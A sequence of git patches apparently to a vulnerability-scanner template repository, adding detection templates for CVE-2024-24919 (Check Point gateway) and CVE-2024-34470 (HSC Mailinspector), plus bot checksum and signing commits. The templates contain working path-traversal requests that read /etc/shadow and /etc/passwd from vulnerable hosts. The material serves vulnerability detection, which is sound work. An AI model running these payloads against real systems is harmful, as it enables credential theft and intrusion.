metadata: From 00be053b247495a14d7907cd8f3cf532ac626f4e Mon Sep 17 00:00:00 2001 From: johnk3r Date: Thu, 30 May 2024 00:48:57 -0300 Subject: [PATCH 466/847] Update CVE-2024-24919.yaml --- http/cves/2024/CVE-2024-24919.yaml | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 9dc5043337..287af21066 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -1,9 +1,13 @@ id: CVE-2024-24919 info: - name: CVE-2024-24919 + name: Check Point R81, R80, R77, R75 - Arbitrary File Read author: johnk3r - severity: medium + severity: high + description: | + CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade. + reference: + - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ metadata: max-request: 1 vendor: checkpoint @@ -21,8 +25,12 @@ http: - type: regex part: body regex: - - "root:" - - "cpep_user:" + - "monitor:\\*:" + - "root:\\*:" + - "cp_routeevt:\\*:" + - "cp_postgres:\\*:" + - "cp_extensions:\\*:" + - "cpep_user:\\*:" - type: status status: From 90fa6e4bb7334157441bd1ed729703b76162a219 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Thu, 30 May 2024 01:33:41 -0300 Subject: [PATCH 467/847] Update CVE-2024-24919.yaml --- http/cves/2024/CVE-2024-24919.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 287af21066..d309063bbe 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -8,6 +8,7 @@ info: CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade. reference: - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ + - https://support.checkpoint.com/results/sk/sk182337 metadata: max-request: 1 vendor: checkpoint From fb94f652fd487175bf10659ad0d0a7d1c3ea3aff Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 30 May 2024 10:22:03 +0530 Subject: [PATCH 468/847] matcher - update --- http/cves/2024/CVE-2024-24919.yaml | 20 +++++++++----------- 1 file changed, 9 insertions(+), 11 deletions(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index d309063bbe..1274372024 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -15,24 +15,22 @@ info: tags: cve,cve2024,checkpoint http: - - method: POST - path: - - "{{BaseURL}}/clients/MyCRL" + - raw: + - | + POST /clients/MyCRL HTTP/1.1 + Host: {{Hostname}} - body: 'aCSHELL/../../../../../../../etc/shadow' + aCSHELL/../../../../../../../etc/shadow matchers-condition: and matchers: - type: regex part: body regex: - - "monitor:\\*:" - - "root:\\*:" - - "cp_routeevt:\\*:" - - "cp_postgres:\\*:" - - "cp_extensions:\\*:" - - "cpep_user:\\*:" + - "root:" + - "nobody:" + conditio: and - type: status status: - - 200 + - 200 \ No newline at end of file From 577d44cf54a314c569451f1fd53aaad81547153a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 30 May 2024 14:22:10 +0530 Subject: [PATCH 469/847] Update CVE-2024-24919.yaml --- http/cves/2024/CVE-2024-24919.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 1274372024..e39e9051bc 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -29,7 +29,7 @@ http: regex: - "root:" - "nobody:" - conditio: and + condition: and - type: status status: From 53840d6582ee56841aa8a05f3370558a9196a693 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 30 May 2024 15:09:10 +0530 Subject: [PATCH 470/847] metadata update --- http/cves/2024/CVE-2024-24919.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index e39e9051bc..8445b9b281 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -12,7 +12,9 @@ info: metadata: max-request: 1 vendor: checkpoint - tags: cve,cve2024,checkpoint + product: quantum_security_gateway + cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* + tags: cve,cve2024,checkpoint,lfi http: - raw: From d861c7f5d6ea6ce9a6486899e538c63c1143920a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 30 May 2024 16:47:43 +0530 Subject: [PATCH 471/847] minor update --- http/cves/2024/CVE-2024-24919.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 8445b9b281..d6def5b623 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -1,7 +1,7 @@ id: CVE-2024-24919 info: - name: Check Point R81, R80, R77, R75 - Arbitrary File Read + name: Check Point Quantum Gateway - Information Disclosure author: johnk3r severity: high description: | @@ -14,6 +14,8 @@ info: vendor: checkpoint product: quantum_security_gateway cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* + shodan-query: html:"Check Point SSL Network" + verified: true tags: cve,cve2024,checkpoint,lfi http: @@ -35,4 +37,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 From cfba91fbf9f10d16aac9af629db895d650c4e54e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 11:23:04 +0000 Subject: [PATCH 472/847] Auto Generated New Template Addition List [Thu May 30 11:23:04 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 742727d535..f202846ea8 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ http/cves/2023/CVE-2023-2059.yaml http/cves/2023/CVE-2023-3077.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml +http/cves/2024/CVE-2024-24919.yaml http/cves/2024/CVE-2024-3495.yaml http/cves/2024/CVE-2024-5230.yaml http/default-logins/ampjuke-default-login.yaml From bea1f258a2b294052f655fc63dd76cdf94617cc6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 11:23:17 +0000 Subject: [PATCH 473/847] Auto Generated Templates Checksum [Thu May 30 11:23:17 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 96efa4f5fd..4ea4c20edc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3277,6 +3277,7 @@ http/cves/2024/CVE-2024-2340.yaml:bf15cb04b444f7c09b0602e12e9bb3c77cd7ecf7 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:91acf4a916db564da116aad3221f1a662477c3ed http/cves/2024/CVE-2024-24131.yaml:71f3b885b69ae4e2beffc8df3a036dcfc75a8cba +http/cves/2024/CVE-2024-24919.yaml:ee64c8928f658d9ebe13a63a69bba14970c11dcc http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 http/cves/2024/CVE-2024-25735.yaml:f7694e6ddea1f334810c1f92161b65fe17c5881c @@ -3311,7 +3312,7 @@ http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b -http/cves/2024/CVE-2024-4956.yaml:d307ad589d80f512df4bfa2bc2f7f727eb32f050 +http/cves/2024/CVE-2024-4956.yaml:a00f92400517494320ec968d237c98bb1056de25 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -8601,7 +8602,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:696e9190411f7f7ecfff24945eade5e5c370d56a +templates-checksum.txt:7d418f68098a78147763158f6b9d99bf8f1ac69d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d679722d904bb014d9a396ecbe447c30d03c6fb8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 11:23:45 +0000 Subject: [PATCH 474/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b1b12f984b..26873904a6 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -10,6 +10,7 @@ on: - 'http/cves/2023/CVE-2023-3077.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' + - 'http/cves/2024/CVE-2024-24919.yaml' - 'http/cves/2024/CVE-2024-3495.yaml' - 'http/cves/2024/CVE-2024-5230.yaml' - 'http/default-logins/ampjuke-default-login.yaml' From 507e4856283ea7179dab215ddc52683d0fbedd7f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 11:25:03 +0000 Subject: [PATCH 475/847] Auto Template Signing [Thu May 30 11:25:03 UTC 2024] :robot: --- http/cves/2024/CVE-2024-24919.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index d6def5b623..65c258a931 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -38,3 +38,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502204c9518dd059877a34844f2e2842d83fd41e2ad0697ab8806694bb9de593e5d4902210097a7f34cde999f290f86e0ea7544cfc1279e367211e05a8f2944fd8c46d352f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From dd76bbf18d5064cb16ab62b18a13b415abc6bf0a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 30 May 2024 17:34:18 +0530 Subject: [PATCH 476/847] Create CVE-2024-34470.yaml --- http/cves/2024/CVE-2024-34470.yaml | 49 ++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 http/cves/2024/CVE-2024-34470.yaml diff --git a/http/cves/2024/CVE-2024-34470.yaml b/http/cves/2024/CVE-2024-34470.yaml new file mode 100644 index 0000000000..5debe0b30e --- /dev/null +++ b/http/cves/2024/CVE-2024-34470.yaml @@ -0,0 +1,49 @@ +id: CVE-2024-34470 + +info: + name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion + author: topscoder + severity: high + description: | + An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server. + reference: + - https://github.com/osvaldotenorio/CVE-2024-34470 + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + epss-score: 0.00043 + epss-percentile: 0.0866 + metadata: + max-request: 1 + fofa-query: "mailinspector/public" + tags: cve,cve2024,lfi,mailinspector,hsc + +http: + - method: GET + path: + - "{{BaseURL}}/mailinspector/login.php" + + host-redirects: true + matchers: + - type: word + part: body + words: + - "Licensed to HSC TREINAMENTO" + + - method: GET + path: + - "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From 5ff8b075e8fe05f84915afe450ec655fcf16e64a Mon Sep 17 00:00:00 2001 From: Paul Werther Date: Thu, 30 May 2024 14:47:16 +0200 Subject: [PATCH 477/847] Add new path for phpmyadmin (#9942) --- http/exposed-panels/phpmyadmin-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/phpmyadmin-panel.yaml b/http/exposed-panels/phpmyadmin-panel.yaml index 210bbb9c66..3ca4c0005b 100644 --- a/http/exposed-panels/phpmyadmin-panel.yaml +++ b/http/exposed-panels/phpmyadmin-panel.yaml @@ -35,6 +35,7 @@ http: - "/web/phpmyadmin/" - "/xampp/phpmyadmin/" - "/phpMyAdmin/" + - "/phpma/" stop-at-first-match: true matchers: @@ -49,4 +50,4 @@ http: group: 1 regex: - 'v=([a-z0-9-._]+)' -# digest: 490a0046304402206d90224ba8f372bdc9b38b257f69f8c77e5c0a914af058f064ba7dd95a08da9102202872893647242184b043cdcc9dd82ea6bfa2165130f30c89737175e8441fe7b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206d90224ba8f372bdc9b38b257f69f8c77e5c0a914af058f064ba7dd95a08da9102202872893647242184b043cdcc9dd82ea6bfa2165130f30c89737175e8441fe7b0:922c64590222798bb761d5b6d8e72950 From 19f0cc60ad53c9b4ba0e414ad3e8f3bed0d8cb88 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 12:47:45 +0000 Subject: [PATCH 479/847] Auto Generated Templates Checksum [Thu May 30 12:47:45 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4ea4c20edc..579e8f0641 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3277,7 +3277,7 @@ http/cves/2024/CVE-2024-2340.yaml:bf15cb04b444f7c09b0602e12e9bb3c77cd7ecf7 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:91acf4a916db564da116aad3221f1a662477c3ed http/cves/2024/CVE-2024-24131.yaml:71f3b885b69ae4e2beffc8df3a036dcfc75a8cba -http/cves/2024/CVE-2024-24919.yaml:ee64c8928f658d9ebe13a63a69bba14970c11dcc +http/cves/2024/CVE-2024-24919.yaml:6e739858871f091c64f572ebffcb7df982653993 http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 http/cves/2024/CVE-2024-25735.yaml:f7694e6ddea1f334810c1f92161b65fe17c5881c @@ -4234,7 +4234,7 @@ http/exposed-panels/php-mailer.yaml:aea625363805a59d157fc0c8fbd98520a658bf37 http/exposed-panels/phpcollab-panel.yaml:00191ff5433780217091e63a42f9a512150ea763 http/exposed-panels/phpldapadmin-panel.yaml:6a326c69ae4087643893609ba63387f5f616cb80 http/exposed-panels/phpminiadmin-panel.yaml:18f7bdeebcddc43b09d75b6430ad561859f97d14 -http/exposed-panels/phpmyadmin-panel.yaml:2d9bff14aecf79c5de71fa8868106d05dd97a01a +http/exposed-panels/phpmyadmin-panel.yaml:465455c9b8ced4f37391fa62b05c96f27c8fa879 http/exposed-panels/phppgadmin-panel.yaml:b644fb2f3c82f4cf2e6acc48ed9502547d0dabe3 http/exposed-panels/pichome-panel.yaml:de9c307297bd6bee1395daea5bf78a75d03462c4 http/exposed-panels/piwigo-panel.yaml:3bdd638ad47c8660f72afd63183653e1bbc01788 @@ -8602,7 +8602,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7d418f68098a78147763158f6b9d99bf8f1ac69d +templates-checksum.txt:24a6d6f26bc3b10881dd3b34c8829a2c4198f189 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7b6d4e69a1e2d001c5c6d1096b9b139fbe05f818 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 12:49:31 +0000 Subject: [PATCH 480/847] Auto Template Signing [Thu May 30 12:49:31 UTC 2024] :robot: --- http/exposed-panels/phpmyadmin-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/phpmyadmin-panel.yaml b/http/exposed-panels/phpmyadmin-panel.yaml index 3ca4c0005b..0147c6c7e9 100644 --- a/http/exposed-panels/phpmyadmin-panel.yaml +++ b/http/exposed-panels/phpmyadmin-panel.yaml @@ -50,4 +50,4 @@ http: group: 1 regex: - 'v=([a-z0-9-._]+)' -# digest: 490a0046304402206d90224ba8f372bdc9b38b257f69f8c77e5c0a914af058f064ba7dd95a08da9102202872893647242184b043cdcc9dd82ea6bfa2165130f30c89737175e8441fe7b0:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206251e9bc53491a3f33d6c6baefde81f328a515ad5fb4ac6471169fec1dfbb9360220567049621b968d8a03cffc3839c9104f4628777cc32a73acdb0649825eb2fad3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 12d28ce30feb0ec93afb8ab713ced63ff150b368 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:10:19 +0000 Subject: [PATCH 481/847] Auto Generated New Template Addition List [Thu May 30 13:10:19 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index f202846ea8..34a79fb5fc 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/exposed-panels/fortinet/fortisiem-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/iot/netgear-boarddataww-rce.yaml +http/misconfiguration/cubebackup-setup-installer.yaml http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml http/misconfiguration/installer/ejbca-enterprise-installer.yaml @@ -29,6 +30,7 @@ http/misconfiguration/installer/invoice-ninja-installer.yaml http/misconfiguration/installer/jfa-go-installer.yaml http/misconfiguration/installer/justfans-installer.yaml http/misconfiguration/installer/librenms-installer.yaml +http/misconfiguration/installer/mura-cms-setup-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/misconfiguration/installer/profittrailer-installer.yaml From e02c2344870bc06937376f59c8df8c7f6d15cba9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:10:49 +0000 Subject: [PATCH 483/847] Auto Generated Templates Checksum [Thu May 30 13:10:49 UTC 2024] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 579e8f0641..ab2994b0d8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4234,7 +4234,7 @@ http/exposed-panels/php-mailer.yaml:aea625363805a59d157fc0c8fbd98520a658bf37 http/exposed-panels/phpcollab-panel.yaml:00191ff5433780217091e63a42f9a512150ea763 http/exposed-panels/phpldapadmin-panel.yaml:6a326c69ae4087643893609ba63387f5f616cb80 http/exposed-panels/phpminiadmin-panel.yaml:18f7bdeebcddc43b09d75b6430ad561859f97d14 -http/exposed-panels/phpmyadmin-panel.yaml:465455c9b8ced4f37391fa62b05c96f27c8fa879 +http/exposed-panels/phpmyadmin-panel.yaml:3ceb853a63f8eb7cbf4c231b0c4f7dbb067f66e6 http/exposed-panels/phppgadmin-panel.yaml:b644fb2f3c82f4cf2e6acc48ed9502547d0dabe3 http/exposed-panels/pichome-panel.yaml:de9c307297bd6bee1395daea5bf78a75d03462c4 http/exposed-panels/piwigo-panel.yaml:3bdd638ad47c8660f72afd63183653e1bbc01788 @@ -5311,6 +5311,7 @@ http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0 http/misconfiguration/cookies-without-httponly-secure.yaml:96433be16faef9b269fa66484b578933815e1e51 http/misconfiguration/corebos-htaccess.yaml:c292dd25e289347ac281d4ce493839827da70784 +http/misconfiguration/cubebackup-setup-installer.yaml:c0084ca8adbf6ed8d4251e66f507c52c616174f8 http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce http/misconfiguration/database-error.yaml:dc9ac279976c76b9957baf5076fccd7722d1c9ce @@ -5473,6 +5474,7 @@ http/misconfiguration/installer/monstra-installer.yaml:bcc03eec7693c2c9e5c960958 http/misconfiguration/installer/moodle-installer.yaml:79053437435e1590bb58eb747a87109c8c5d026b http/misconfiguration/installer/moosocial-installer.yaml:fcb42a5d3af9d846ec71cc165bde4962bb381c71 http/misconfiguration/installer/mosparo-install.yaml:0b6f15dce7c5579e4e7a2db365050972b8be308a +http/misconfiguration/installer/mura-cms-setup-installer.yaml:401479001b7098dfdd05509b12b0937fcb3de681 http/misconfiguration/installer/nagiosxi-installer.yaml:3dbd7b4606de96c3d2ef86245924586928ade5c9 http/misconfiguration/installer/netsparker-enterprise-installer.yaml:87452a1aa538401b678c40487818511b300f67d2 http/misconfiguration/installer/nginx-auto-installer.yaml:ad565c9eee92dff96cc6487522724d96386339d9 @@ -8602,7 +8604,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:24a6d6f26bc3b10881dd3b34c8829a2c4198f189 +templates-checksum.txt:9490e5bdae3725e1074a9d8651c15d9d51ce41d9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1d1e50642a70b639f7f0c7f7b7a69ed896b6f2c3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:11:04 +0000 Subject: [PATCH 484/847] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 26873904a6..e8a76f84af 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,7 @@ on: - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/iot/netgear-boarddataww-rce.yaml' + - 'http/misconfiguration/cubebackup-setup-installer.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml' @@ -34,6 +35,7 @@ on: - 'http/misconfiguration/installer/jfa-go-installer.yaml' - 'http/misconfiguration/installer/justfans-installer.yaml' - 'http/misconfiguration/installer/librenms-installer.yaml' + - 'http/misconfiguration/installer/mura-cms-setup-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/misconfiguration/installer/profittrailer-installer.yaml' From 5288e7fcadffb83028b040f6ef625b5b2998d4e1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:11:34 +0000 Subject: [PATCH 485/847] Auto Generated New Template Addition List [Thu May 30 13:11:34 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 34a79fb5fc..6e36481c61 100644 --- a/.new-additions +++ b/.new-additions @@ -33,6 +33,7 @@ http/misconfiguration/installer/librenms-installer.yaml http/misconfiguration/installer/mura-cms-setup-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml +http/misconfiguration/installer/pandora-fms-installer.yaml http/misconfiguration/installer/profittrailer-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml http/misconfiguration/installer/snipe-it-installer.yaml From 2fd8441999be9183707039073d2f70ee08b2c467 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:11:45 +0000 Subject: [PATCH 486/847] Auto Generated Templates Checksum [Thu May 30 13:11:45 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ab2994b0d8..c8e7f5cea2 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5493,6 +5493,7 @@ http/misconfiguration/installer/orangescrum-install.yaml:a8eed9d3051fb349be44b0c http/misconfiguration/installer/owncloud-installer-exposure.yaml:66cb802db3587a09427dc183b8df0e94ca3fe2d8 http/misconfiguration/installer/oxid-eshop-installer.yaml:f5a2e54a7f5c13e18209df8cb2830e095c83ba5c http/misconfiguration/installer/pagekit-installer.yaml:eb1972138f70ad53ae1b4ef6f5004d9470fdaee6 +http/misconfiguration/installer/pandora-fms-installer.yaml:78f905cee7803a1ef39ef1a23190a35a2bf8fcf0 http/misconfiguration/installer/permissions-installer.yaml:ffeca03066710cc2c3ac03565db2994d603c8537 http/misconfiguration/installer/phpbb-installer.yaml:5f50f480c25285283d3f0704aa52afc97a43483a http/misconfiguration/installer/phpgedview-installer.yaml:c3abf511068283554097640a87a899102a008d08 @@ -8604,7 +8605,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9490e5bdae3725e1074a9d8651c15d9d51ce41d9 +templates-checksum.txt:855e4ff1ac258da766e247c5568bab892a99454b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ea5125898cb4a7f6996343b946c7ce7950acf55d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:12:10 +0000 Subject: [PATCH 487/847] Auto Template Signing [Thu May 30 13:12:10 UTC 2024] :robot: --- http/misconfiguration/cubebackup-setup-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/cubebackup-setup-installer.yaml b/http/misconfiguration/cubebackup-setup-installer.yaml index 55b903fb1c..2850b0a3b4 100644 --- a/http/misconfiguration/cubebackup-setup-installer.yaml +++ b/http/misconfiguration/cubebackup-setup-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450220128cfc82d3dff26aed49cee5aa69ca7428cd65495bf2a70cc8d405825af8f976022100bcc76a3c09d698786cd3f8071a590aa9c8b11291474ffc8fb9adf142af9a8929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5abb3e73332884179806446a7cf4d3320d2961c3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:12:14 +0000 Subject: [PATCH 488/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml 